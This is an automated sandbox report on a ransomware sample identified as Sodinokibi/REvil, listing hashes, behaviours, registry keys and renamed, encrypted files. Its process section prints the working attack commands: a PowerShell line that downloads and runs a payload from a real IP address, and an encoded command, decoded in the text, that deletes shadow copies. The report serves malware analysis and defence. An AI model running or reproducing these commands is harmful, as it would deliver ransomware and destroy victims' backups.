Analysis
Max time kernel: 115s
Max time network: 126s
Platform: windows7_x64
Resource: win7v191014
Submitted: 10-02-2020 21:10
Static task: static1
Behavioral task: behavioral1
- Sample: 4jD1biG2.bat
- Resource: win7v191014 (windows7_x64)
- 0 signatures, 0 seconds
Behavioral task: behavioral2
- Sample: 4jD1biG2.bat
- Resource: win10v191014 (windows10_x64)
- 0 signatures, 0 seconds
General
Target: 4jD1biG2.bat
Size: 191B
MD5: 6097db04a430a1a65515bae911e13c6e
SHA1: 41f39ba8f63c6ff8067348f596155beb32c45f17
SHA256: 5743310e1c2bd52d3abf50fa874a206e42a4aac4e182447e99f3cf32be4334ed
SHA512: 22fd4f652757e39fca2fa7b8a5d51cf951b76b200764b0ad45aa01cd38f9cbfb63df5542f08606fc198857cdecf1e4fd14d1cd005805203469b9dbb9a52ed777
Score: 10/10
Malware Config
Extracted
- Language: ps1
- Source:
- URLs:
  - ps1.dropper: http://185.103.242.78/pastes/4jD1biG2
Extracted
- Language: ps1
- Source:
Signatures
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality

Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes: powershell.exe
- PID 1312 powershell.exe
Suspicious use of AdjustPrivilegeToken (6 IoCs)
Processes: powershell.exe, powershell.exe, vssvc.exe
- Token: SeDebugPrivilege, PID 1312 powershell.exe
- Token: SeDebugPrivilege, PID 1312 powershell.exe
- Token: SeDebugPrivilege, PID 1536 powershell.exe
- Token: SeBackupPrivilege, PID 1352 vssvc.exe
- Token: SeRestorePrivilege, PID 1352 vssvc.exe
- Token: SeAuditPrivilege, PID 1352 vssvc.exe
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes: powershell.exe, powershell.exe
- PID 1312 powershell.exe
- PID 1312 powershell.exe
- PID 1312 powershell.exe
- PID 1536 powershell.exe
- PID 1536 powershell.exe
Drops file in Program Files directory (33 IoCs)
Processes: powershell.exe
- File renamed: C:\Program Files\UnregisterEnable.ods => \??\c:\program files\UnregisterEnable.ods.7tu3h3ky (powershell.exe)
- File opened for modification: \??\c:\program files\RegisterJoin.vsd (powershell.exe)
- File renamed: C:\Program Files\PublishCopy.ppt => \??\c:\program files\PublishCopy.ppt.7tu3h3ky (powershell.exe)
- File renamed: C:\Program Files\UseSkip.xps => \??\c:\program files\UseSkip.xps.7tu3h3ky (powershell.exe)
- File opened for modification: \??\c:\program files\PublishCopy.ppt (powershell.exe)
- File renamed: C:\Program Files\PushFormat.jpe => \??\c:\program files\PushFormat.jpe.7tu3h3ky (powershell.exe)
- File opened for modification: \??\c:\program files\StepConnect.temp (powershell.exe)
- File opened for modification: \??\c:\program files\UnprotectWait.html (powershell.exe)
- File renamed: C:\Program Files\UnprotectWait.html => \??\c:\program files\UnprotectWait.html.7tu3h3ky (powershell.exe)
- File created: \??\c:\program files\microsoft sql server compact edition\v3.5\7tu3h3ky-readme.txt (powershell.exe)
- File renamed: C:\Program Files\JoinMove.vbs => \??\c:\program files\JoinMove.vbs.7tu3h3ky (powershell.exe)
- File opened for modification: \??\c:\program files\DebugRevoke.txt (powershell.exe)
- File opened for modification: \??\c:\program files\ImportLimit.rm (powershell.exe)
- File created: \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\7tu3h3ky-readme.txt (powershell.exe)
- File created: \??\c:\program files\7tu3h3ky-readme.txt (powershell.exe)
- File renamed: C:\Program Files\ConfirmUpdate.mpeg2 => \??\c:\program files\ConfirmUpdate.mpeg2.7tu3h3ky (powershell.exe)
- File renamed: C:\Program Files\ConvertFromGet.xla => \??\c:\program files\ConvertFromGet.xla.7tu3h3ky (powershell.exe)
- File opened for modification: \??\c:\program files\MountBlock.xltx (powershell.exe)
- File renamed: C:\Program Files\MountBlock.xltx => \??\c:\program files\MountBlock.xltx.7tu3h3ky (powershell.exe)
- File renamed: C:\Program Files\StepConnect.temp => \??\c:\program files\StepConnect.temp.7tu3h3ky (powershell.exe)
- File created: \??\c:\program files (x86)\7tu3h3ky-readme.txt (powershell.exe)
- File opened for modification: \??\c:\program files\JoinMove.vbs (powershell.exe)
- File opened for modification: \??\c:\program files\PushFormat.jpe (powershell.exe)
- File opened for modification: \??\c:\program files\UseSkip.xps (powershell.exe)
- File renamed: C:\Program Files\DebugRevoke.txt => \??\c:\program files\DebugRevoke.txt.7tu3h3ky (powershell.exe)
- File renamed: C:\Program Files\ImportLimit.rm => \??\c:\program files\ImportLimit.rm.7tu3h3ky (powershell.exe)
- File renamed: C:\Program Files\RegisterJoin.vsd => \??\c:\program files\RegisterJoin.vsd.7tu3h3ky (powershell.exe)
- File opened for modification: \??\c:\program files\UnregisterEnable.ods (powershell.exe)
- File opened for modification: \??\c:\program files\WaitDebug.mhtml (powershell.exe)
- File opened for modification: \??\c:\program files\ConfirmUpdate.mpeg2 (powershell.exe)
- File created: \??\c:\program files\microsoft sql server compact edition\7tu3h3ky-readme.txt (powershell.exe)
- File renamed: C:\Program Files\WaitDebug.mhtml => \??\c:\program files\WaitDebug.mhtml.7tu3h3ky (powershell.exe)
- File opened for modification: \??\c:\program files\ConvertFromGet.xla (powershell.exe)
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes: powershell.exe
- Set value (str): \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\o7x85unt95y.bmp" (powershell.exe)
Suspicious use of WriteProcessMemory (5 IoCs)
Processes: cmd.exe, powershell.exe
- PID 1216 (cmd.exe) wrote to memory of PID 1312 (powershell.exe)
- PID 1312 (powershell.exe) wrote to memory of PID 1536 (powershell.exe)
- PID 1312 (powershell.exe) wrote to memory of PID 1536 (powershell.exe)
- PID 1312 (powershell.exe) wrote to memory of PID 1536 (powershell.exe)
- PID 1312 (powershell.exe) wrote to memory of PID 1536 (powershell.exe)
Blacklisted process makes network request (1 IoC)
Processes: powershell.exe
- Flow 8, PID 1312 powershell.exe
Discovering connected drives (3 TTPs, 7 IoCs)
Processes: powershell.exe, powershell.exe, cmd.exe
- File opened (read-only): \??\C: (powershell.exe)
- File opened (read-only): \??\C: (powershell.exe)
- File opened (read-only): \??\A: (powershell.exe)
- File opened (read-only): \??\B: (powershell.exe)
- File opened (read-only): \??\E: (powershell.exe)
- File opened (read-only): \??\C: (cmd.exe)
- File opened (read-only): \??\F: (powershell.exe)
Processes
C:\Windows\system32\cmd.exe (PID 1216)
Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\4jD1biG2.bat"
- Suspicious use of WriteProcessMemory
- Discovering connected drives
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1312)
  Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/4jD1biG2');Invoke-PBEESOQZ;Start-Sleep -s 10000"
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  - Drops file in Program Files directory
  - Sets desktop wallpaper using registry
  - Suspicious use of WriteProcessMemory
  - Blacklisted process makes network request
  - Discovering connected drives
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1536)
    Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
    (the -e argument is base64-encoded UTF-16LE and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();})
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Discovering connected drives
C:\Windows\system32\vssvc.exe (PID 1352)
Command line: C:\Windows\system32\vssvc.exe
- Modifies service
- Suspicious use of AdjustPrivilegeToken